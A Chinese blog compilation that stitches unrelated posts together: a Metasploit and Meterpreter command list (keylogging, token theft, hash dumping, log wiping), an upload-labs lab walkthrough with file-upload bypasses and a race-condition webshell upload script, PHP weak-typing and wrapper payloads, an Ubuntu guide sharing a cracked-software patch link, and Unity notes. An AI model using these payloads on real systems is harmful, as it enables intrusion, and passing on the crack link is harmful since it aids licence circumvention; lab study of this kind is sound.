日常逛大牛们的博客，发现车王有一篇文章，就转了。

本文记录一下基础命令

命令： show exploits

列出metasploit框架中的所有渗透攻击模块。

命令：show payloads

列出metasploit框架中的所有攻击载荷。

命令：show auxiliary

列出metasploit框架中的所有辅助攻击载荷。

命令：search name

查找metasploit框架中所有的渗透攻击和其他模块。

命令：info

展示出制定渗透攻击或模块的相关信息。

命令：use name

装载一个渗透攻击或模块。

命令：LHOST

你本地可以让目标主机连接的IP地址，通常当目标主机不在同一个局域网内时，就需要是一个公共IP地址，特别为反弹式shell使用。

命令：RHOST

远程主机或是目标主机。

命令：set function

设置特定的配置参数（EG：设置本地或远程主机参数）。

命令：setg function

以全局方式设置特定的配置参数（EG：设置本地或远程主机参数）。

命令：show options

列出某个渗透攻击或模块中所有的配置参数。

命令：show targets

列出渗透攻击所有支持的目标平台。

命令：set target num

指定你所知道的目标的操作系统以及补丁版本类型。

命令：set payload name

指定想要使用的攻击载荷。

命令：show advanced

列出所有高级配置选项。

命令：set autorunscript migrate -f.

在渗透攻击完成后，将自动迁移到另一个进程。

命令：check

检测目标是否选定渗透攻击存在相应的安全漏洞。

命令：exploit

执行渗透攻击或模块来攻击目标。

命令：exploit -j

在计划任务下进行渗透攻击（攻击将在后台进行）。

命令：exploit -z

渗透攻击完成后不与回话进行交互。

命令：exploit -e encoder

制定使用的攻击载荷编码方式（EG：exploit -e shikata_ga_nai）。

命令：exploit -h

列出exploit命令的帮助信息。

命令：sessions -l

列出可用的交互会话（在处理多个shell时使用）。

命令：sessions -l -v

列出所有可用的交互会话以及详细信息，EG：攻击系统时使用了哪个安全漏洞。

命令：sessions -s script

在所有活跃的metasploit会话中运行一个特定的metasploit脚本。

命令：sessions -K

杀死所有活跃的交互会话。

命令：sessions -c cmd

在所有活跃的metasploit会话上执行一个命令。

命令：sessions -u sessionID

升级一个普通的win32 shell到metasploit shell。

命令：db_create name

创建一个数据库驱动攻击所要使用的数据库（EG：db_create autopwn）。

命令：db_connect name

创建并连接一个数据库驱动攻击所要使用的数据库（EG：db_connect user:passwd@ip/sqlname）。

命令：db_namp

利用nmap并把扫描数据存储到数据库中（支持普通的nmap语句，EG：-sT -v -P0）。

命令：db_autopwn -h

展示出db_autopwn命令的帮助信息。

命令：db_autopwn -p -r -e

对所有发现的开放端口执行db_autopwn，攻击所有系统，并使用一个反弹式shell。

命令：db_destroy

删除当前数据库。

命令：db_destroy user：passwd@host：port/database

使用高级选项来删除数据库。

metasploit命令Permalink

help 打开meterpreter使用帮助。

run scriptname 运行meterpreter脚本，在scripts/meterpreter目录下可查看到所有脚本名。

sysinfo 列出受控主机的系统信息。

ls 列出目标主机的文件和文件夹信息。

use priv 加载特权提升扩展模块，来扩展metasploit库。

ps 显示所有运行的进程以及相关联的用户账户。

migrate PID 迁移到一个指定的进程ID（PID号可通过ps命令从主机上获得）。

use incognito 加载incognito功能（用来盗窃目标主机的令牌或假冒用户）

list_tokens -u 列出目标主机用户的可用令牌。

list_tokens -g 列出目标主机用户组的可用令牌。

impersonate_token DOMAIN_NAME\USERNAME 假冒目标主机上的可用令牌。

steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒。

drop_token 停止假冒当前令牌。

getsystem 通过各种攻击向量来提升系统用户权限。

execute -f cmd.exe -i 执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令并隐藏该进程。

rev2self 回到控制目标主机的初始用户账户下。

reg command 在目标主机注册表中进行交互，创建，删除，查询等操作。

setdesktop number 切换到另一个用户界面（该功能基于那些用户已登录）。

screenshot 对目标主机的屏幕进行截图。

upload file 向目标主机上传文件。

download file 从目标主机下载文件。

keyscan_start 针对远程目标主机开启键盘记录功能。

keyscan_dump 存储目标主机上捕获的键盘记录。

keyscan_stop 停止针对目标主机的键盘记录。

getprivs 尽可能多的获取目标主机上的特权。

uictl enable keyboard/mouse 接管目标主机的键盘和鼠标。

background 将你当前的metasploit shell转为后台执行。

hashdump 导出目标主机中的口令哈希值。

use sniffer 加载嗅探模式。

sniffer_interfaces 列出目标主机所有开放的网络端口。

sniffer_dump interfaceID pcapname 在目标主机上启动嗅探。

sniffer_start interfaceID packet-buffer 在目标主机上针对特定范围的数据包缓冲区启动嗅探。

sniffer_stats interfaceID 获取正在实施嗅探网络接口的统计数据。

sniffer_stop interfaceID 停止嗅探。

add_user username password -h ip 在远程目标主机上添加一个用户。

clearev 清楚目标主机上的日志记录。

timestomp 修改文件属性，例如修改文件的创建时间（反取证调查）。

reboot 重启目标主机。

本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs (最新commit17ec936) 的19个上传关卡的方法。

文章适合有一定上传绕过知识基础的读者阅读，绕过原理请参考其它文章和项目源码，限于篇幅文章中不展开解释。

0x01：测试配置

可直接下载作者的配置好的PHPStudy靶场运行环境，节省时间。

0x02：绕过方法

Pass-01

前端禁用JS，直接上传Webshell

Pass-02

截断上传数据包，修改Content-Type为image/gif，然后放行数据包

Pass-03

重写文件解析规则绕过。上传先上传一个名为.htaccess文件，内容如下：

<FilesMatch "03.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后再上传一个03.jpg

执行上传的03.jpg脚本

Pass-04

利用PHP 和 Windows环境的叠加特性，以下符号在正则匹配时的相等性：

双引号"     =   点号.
大于符号>   =   问号?
小于符号<   =   星号*

先上传一个名为4.php:.jpg的文件，上传成功后会生成4.php的空文件，大小为0KB.

然后将文件名改为4.<或4.<<<或4.>>>或4.>><后再次上传，重写4.php文件内容，Webshell代码就会写入原来的4.php空文件中。

Pass-05

文件名后缀大小写混合绕过。05.php改成05.phP然后上传

Pass-06

利用Windows系统的文件名特性。文件名最后增加点和空格，写成06.php.，上传后保存在Windows系统上的文件名最后的一个.会被去掉，实际上保存的文件名就是06.php

Pass-07

原理同Pass-06，文件名后加点，改成07.php.

Pass-08

Windows文件流特性绕过，文件名改成08.php::$DATA，上传成功后保存的文件名其实是08.php

Pass-09

原理同Pass-06，上传文件名后加上点+空格+点，改为09.php. .

Pass-10

双写文件名绕过，文件名改成10.pphphp

Pass-11

上传路径名%00截断绕过。上传的文件名写成11.jpg, save_path改成../upload/11.php%00，最后保存下来的文件就是11.php

Pass-12

php.ini设置 magic_quotes_gpc = Off

原理同Pass-11，上传路径0x00绕过。利用Burpsuite的Hex功能将save_path改成../upload/12.php【二进制00】形式

Pass-13

绕过文件头检查，添加GIF图片的文件头GIF89a，绕过GIF图片检查。

使用命令copy normal.jpg /b + shell.php /a webshell.jpg，将php一句话追加到jpg图片末尾，代码不全的话，人工补充完整。形成一个包含Webshell代码的新jpg图片，然后直接上传即可。JPG一句话shell参考示例

png图片处理方式同上。PNG一句话shell参考示例

Pass-14

原理和示例同Pass-13，添加GIF图片的文件头绕过检查

png图片webshell上传同Pass-13。

jpg/jpeg图片webshell上传存在问题，正常的图片也上传不了，等待作者调整。

Pass-15

原理同Pass-13，添加GIF图片的文件头绕过检查

png图片webshell上传同Pass-13。

jpg/jpeg图片webshell上传同Pass-13。

Pass-16

原理：将一个正常显示的图片，上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分，将Webshell代码插在该部分，然后上传。具体实现需要自己编写Python程序，人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。

这里提供一个包含一句话webshell代码并可以绕过PHP的imagecreatefromgif函数的GIF图片示例。

打开被渲染后的图片，Webshell代码仍然存在

提供一个jpg格式图片绕过imagecreatefromjpeg函数渲染的一个示例文件。 直接上传示例文件会触发Warning警告，并提示文件不是jpg格式的图片。但是实际上已经上传成功，而且示例文件名没有改变。

从上面上传jpg图片可以看到我们想复杂了，程序没有对渲染异常进行处理，直接在正常png图片内插入webshell代码，然后上传示例文件即可，并不需要图片是正常的图片。

程序依然没有对文件重命名，携带webshell的无效损坏png图片直接被上传成功。

Pass-17

利用条件竞争删除文件时间差绕过。使用命令pip install hackhttp安装hackhttp模块，运行下面的Python代码即可。如果还是删除太快，可以适当调整线程并发数。

#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey

import hackhttp
from multiprocessing.dummy import Pool as ThreadPool


def upload(lists):
    hh = hackhttp.hackhttp()
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream

<?php assert($_POST["LandGrey"])?>
-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(code) + "\r")


pool = ThreadPool(10)
pool.map(upload, range(10000))
pool.close()
pool.join()

在脚本运行的时候，访问Webshell

Pass-18

刚开始没有找到绕过方法，最后下载作者Github提供的打包环境，利用上传重命名竞争+Apache解析漏洞，成功绕过。

上传名字为18.php.7Z的文件，快速重复提交该数据包，会提示文件已经被上传，但没有被重命名。

快速提交上面的数据包，可以让文件名字不被重命名上传成功。

然后利用Apache的解析漏洞，即可获得shell

Pass-19

原理同Pass-11，上传的文件名用0x00绕过。改成19.php【二进制00】.1.jpg

0x03：后记

可以发现以上绕过方法中有些是重复的，有些是意外情况，可能与项目作者的本意不符，故本文仅作为参考使用。

等作者修复代码逻辑后，本文也会适时更新。

PHP是一门比较松散的语言，即简单方便，又容易出现一些问题。本文主要总结一些作者遇到过的一些知识点，弱类型、变量覆盖、正则表达式、以及php伪协议等。（欢迎各位小伙伴补充交流）

一 、PHP弱类型

0x01 “==”与”===”的区别

“==”在进行比较时先将字符串类型转化成相同在比较。（如果比较涉及到数字内容的字符串，则字符串会被转换成数值，并且比较按照数值大小来进行）

“===”在进行比较时先进行字符串类型判断，再比教。

“根据php手册中所讲，字符串的开头决定了它转换后的值，如果该字符串以合法的数值开始，则使用该合法数值，否则其值为0”

1 == ‘1’; //true

1 == ‘1abc’; //true

0 == ‘admin’; //true

0 === ‘admin’; //false

0e开头的字符串，在比较时被当作科学记数法。所以在hash比较时我们可以利用php弱类型，进行绕过。这里以md5为例
<?php 

if(isset($_POST['uname'])&&isset($_POST['pwd'])){

     if(md5($_POST['pwd'] == 0)){

         echo $flag; 

     } 

} 

?>

贴一些常用到的md5 ==0的字符串。
QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

s1885207154a
0e509367213418206700842008763514

并且md5()无法处理数组，所以当传入两个数组时两边都会返回null

var_dump(md5($array1)==var_dump($array2)); //true
var_dump(null==null); //true

0x02  strcmp()、strcasecmp()函数

strcmp()和strcasecmp()函数用于比较两个字符串，前者区分大小写。这两个函数都无法处理数组，当传入数组时，返回null。
$flag = "*******";
if(strcmp(($_GET['user']),$flag) == 0){
echo $flag;
}

var_dump(null==0); //true 

0x03  switch()函数

如果是数字类型的case的话，switch会将参数转化为数值。

$id = "2bc";
switch($id){
case 1:
case 2:
echo $flag;}

0x04  json绕过
$message = json_decode($_POST['message']);
$key ="*********";
if ($message->key == $key) {
echo "flag";
}
else {
echo "fail";
}
}
else{
echo "~~~~";
}

输入一个json类型的字符串，json_decode会解码为一个数组。payload为 message = {“key”:0}

二、变量覆盖

0x01  $$的使用

if (!isset($_POST["flag"]) )
die($_403);
foreach ($_GET as $k => $v){
$$k = $$v;
}
foreach ($_POST as $k => $v){
$$k = $v;
}
if ( $_POST["flag"] !== $flag )
die($_403);
echo "flag: ". $flag . "\n";
die($_200);

0x02  extract()函数

该函数使用数组键名作为变量名，使用数组键值作为变量值针对数组中的每一个元素，将在当前符号表中创建对应的一个变量。
$flag = "******"
extract($_GET)
if($text == $f){
echo $flag
}

最终payload为： ?text=&f=

0x03  parse_str()函数

该函数用于把查询字符串解析到变量中，如果没有array参数，则由该函数设置的变量将覆盖已存在的同名变量。
$chabug = 'www.chabug.com';
parse_str($_SERVER['QUERY_STRING']);
echo $chabug;

payload为： ?chabug=s1ye  则页面返回 s1ye

三、正则表达式

0x01  eregi()函数
字符串对比解析，当ereg读取字符串string时,%00后面的字符串不会不会被解析。
if (ereg ("^[a-zA-Z]+$", $_GET['a']) !== FALSE) {
echo 'You password must be alphabet';

?a=abc%00123可以绕过(php 5.3x已经不再支持该用法)

0x02  preg_replace()函数
preg_replace() 的第一个参数如果存在 /e 模式修饰符，则允许代码执行。（如果没有/e修饰符可以尝试%00截断。）
preg_replace("/test/e",$_GET["chabug"],"jutst test");

payload:  ?chabug=phpinfo()

四、PHP伪协议

php伪协议(file://,php://filter,php://input,zip://,compress.bzip2://,compress.zlib://,data://)

php版本 <= 5.2可以使用%00进行截断。

file:// 在 allow_url_fopen和allow_url_include双off情况下可以正常使用，用于访问本地文件系统。

用法： file://文件绝对路径和文件名

php://  不需要开启allow_url_fopen(仅php://input,php://stdin,php://memory和php://temp需要开启allow_url_include)

php://filter 读取源码并进行base64编码输出,不然会直接当作php代码执行，就看不到源代码内容了。(在双off下可以正常使用)

php://input 可以访问请求的原始数据的只读流,将post请求中的数据作为php代码执行。

例如：

get:  /include.php?file=php://input

post: <?php phpinfo(); ?>

就会返回phpinfo信息。也可以构造语句getshell。

zip://,bzip://,zlib://协议在双off的情况下也可以正常使用。

使用方法:

zip://chabug.zip#flag.txt（zip://绝对路径#子文件名,flag.txt内容就会以php代码执行。）

compress.bzip2://chabug.bz2和compress.zlib://chabug.gz用法相同

/include.php?file=compress.bzip2://绝对路径/shell.jpg 或者 compress.bzip2://./shell.jpg

data://协议(需要满足双on条件)

/include.php?file=data://text/plain,<?php phpinfo();?>

or data://text/plain;base64,PD9waHAgcGhwaW5mbygpPw4=

or data:text/plain,<?php phpinfo();?>

or data:text/plain;base64,PD9waHAgcGhwaW5mbygpPw4=

五、PHP别名

php2,php3,php4,php5,phps,pht,phtm,phtml。

在这里把自己遇到的一些常见知识点总结并分享出来，欢迎各位小伙伴交流指点。

参考链接：

php伪协议实现命令执行的七种姿势

代码审计|变量覆盖漏洞

ubuntu贼好用@(捂嘴笑)

安装

下载桌面版镜像 点我ubuntu 18.04直连下载
使用U盘操作系统安装工具- Universal USB Installer最新版将iso镜像写入到u盘里，下一步下一步就行了。

开机进入u盘，如果你有两张显卡（集成显卡+N卡），可能会卡在启动logo，这需要在开机时install ubuntu选项按下e键，在quiet splash后面加上 nomodeset注意有一个空格，然后进入就可以安装了。

优化

装显卡驱动

不装驱动的话会出现各种bug，这个必须装。
1.禁用nouveau驱动
使用下面命令行打开文件

sudo nautilus

找到/etc/modprobe.d/blacklist.conf这个路径下的blacklist.conf文件
用gedit打开blacklist.conf并在在文件末尾添加如下几行：

blacklist vga16fb
blacklist nouveau
blacklist rivafb
blacklist rivatv
blacklist nvidiafb

保存

2.更新一下内核

sudo update-initramfs -u

3.重启系统
修改后需要重启系统确认nouveau是否已经被屏蔽掉，使用lsmod命令查看：

lsmod | grep nouveau

4.安装NVIDIA驱动

使用如下命令添加Graphic Drivers PPA

sudo add-apt-repository ppa:graphics-drivers/ppa
sudo apt-get update

寻找合适的驱动版本

ubuntu-drivers devices

找到有recommended（推荐）就是要下载的驱动版本,记下版本数字

安装NVIDIA driver

sudo apt-get install nvidia-384

安装完成后重启

sudo reboot

重启系统后，执行下面的命令查看驱动的安装状态显示安装成功

sudo nvidia-smi

到这里安装就算完成了，你可以进入/usr/share/applications/目录下找到软件图标，把它复制粘贴到桌面就行了

安装TIM

使用corssover安装，直接在官网下载安装包，缺什么依赖装什么就行了。
因为这个软件是付费的，我在这分享一个破解补丁
链接: https://pan.baidu.com/s/1Z-y_TbeChzBsh9WIwLqGyQ 密码: a852

sudo mv /opt/cxoffice/lib/wine/winewrapper.exe.so /opt/cxoffice/lib/wine/winewrapper.exe.so.bak
sudo cp winewrapper.exe.so /opt/cxoffice/lib/wine/

安装好tim可能会乱码，找一个中文的ttf字体然后扔到/opt/cxoffice/share/wine/fonts目录就行了。
如果无法输入密码，按win+空格切换为原生的输入法再输入就ok。

已知bug

1. TIM没声音，无法记住密码
2. 主题有时候重启会乱
3. 笔记本费电贼快#(无奈)

1. Character Controller

可以让角色“动起来”的常用组件有三个：Transform，Rigidbody，Character Controller
角色控制器也属于物理组件，它的位置在：
Component- >Physics- >Character Controller
角色控制器主要用于第三人称或者第一人称游戏主角(人形为主)控制。

1. 控制角色移动
   SimpleMove（Vector3）：简单移动

以一定的速度移动角色，会自动应用重力。
[角色控制器不是刚体，但是具备刚体的一些属性]
Move（Vector3）：移动
更为复杂的一种运动，每次都绝对运动，不会应用重力。

水平：Horizontal，对应 AD 键，以及方向键的←和→。
垂直：Vertical，对应 WS 键，以及方向键的↑和↓。
轴向有返回值的，范围为-1 ~ 0 ~ 1。根据按键的力度返回相应的值。
4.取得轴向的值
Input.GetAxis（“轴向名称”）;

float horizontal=Input.GetAxis("Horizontal");
float vertical = Input.GetAxis ("Vertical");
//具有刚体的一些属性的简单移动
m_CC.SimpleMove ((new Vector3 (horizontal, 0, vertical))*3);
//移动 不会掉落
m_CC.Move ((new Vector3 (horizontal, 0, vertical))*0.333f);

角色控制器属性讲解

1. Slope Limit

斜率限制，控制角色最大的爬坡斜度。[演示：角色爬坡]

1. Step Offset

台阶高度，控制角色可以迈上最大的台阶高度。[演示：角色上台阶]

1. Skin Width [默认即可]

皮肤厚度，在角色的外围包裹着一层“皮肤”，设置这层皮肤的厚度。
数值调大，最明显的就是角色和地面之间的间距变大，也就是角色皮肤变厚了。

1. Min Move Distance [默认即可]

最小移动距离，默认是 0.001，也就是 1 毫米。
如果该数值调大，但代码中单位移动速度很慢，角色就不会动。

1. Center/Radius/Height

角色控制器组件在 Scene 面板中体现为一个“胶囊碰撞器”的形状。
Center：控制中心点的位置；
Radius：控制半径；
Height：控制高度。

小技巧：在 Game 面板将 Gizmos 设置为选中状态，可以在运行状态看到组
件的图标，方便运行过程中对组件进行调试。

方法

void OnControllerColliderHit(ControllerColliderHit hit){
    Debug.Log (hit.gameObject.name);
}

Apply Root Motion

勾选上之后，如果动画有位移，则真的发生位移。

动画过渡延迟

把过渡线上的Has Exit Time勾掉即可马上过渡。

value = Input.GetAxis ("Horizontal");
一个轴具有-1和1之间的值。中间位置为0。这种情况用于操纵杆输入和键盘输入。

然而，鼠标增量和Window Shake增量是鼠标或窗口从上一帧到现在的移动。这意思是当用户快速移动鼠标时，它可能大于1或小于-1。

参数内容如下:

1.触屏类：

MouseX 鼠标按着并沿着屏幕X轴方向滑动时触发

MouseY 鼠标按着并沿着屏幕Y轴方向滑动时触发

Mouse ScrollWheel 当鼠标滚动轮滚动时触发

2.键盘操作类：

1.Vertical 对应键盘上面的上下箭头，当按下上或下箭头时触发

2.Horizontal 对应键盘上面的左右箭头，当按下左或右箭头时触发

    using UnityEngine;
    using System.Collections;
    public class example :Monobehaviour {
        public float speed = 10.0F;
        public float rotationSpeed = 100.0F;
        void Update() {
            float translation = Input.GetAxis("Vertical") * speed;
            float rotation = Input.GetAxis("Horizontal") * rotationSpeed;
            translation *= Time.deltaTime;
            rotation *= Time.deltaTime;
            transform.Translate(0, 0, translation);
            transform.Rotate(0, rotation, 0);
        }
    }

// A very simplistic car driving on the x-z plane.
// 一个十分简单的在x-z平面的驾车例子
var speed : float = 10.0;
var rotationSpeed : float = 100.0;
function Update () {
    // Get the horizontal and vertical axis.
    //获取横向和纵向坐标轴
    // By default they are mapped to the arrow keys.
    //默认情况下他们关联到方向键上
    // The value is in the range -1 to 1
    //值的范围是在-1到1之间
    var translation : float = Input.GetAxis ("Vertical") * speed;
    var rotation : float = Input.GetAxis ("Horizontal") * rotationSpeed;
    // Make it move 10 meters per second instead of 10 meters per frame...
    // 使它每帧移动10米变为每秒移动10米...
    translation *= Time.deltaTime;
    rotation *= Time.deltaTime;
    // Move translation along the object's z-axis
    //沿着z轴平移对象
    transform.Translate (0, 0, translation);
    // Rotate around our y-axis
    //以我们的y轴为中心旋转

最近参加省比赛，临时学的Unity，整理一份笔记。
移步 https://book.chabug.org/unitybi-ji.html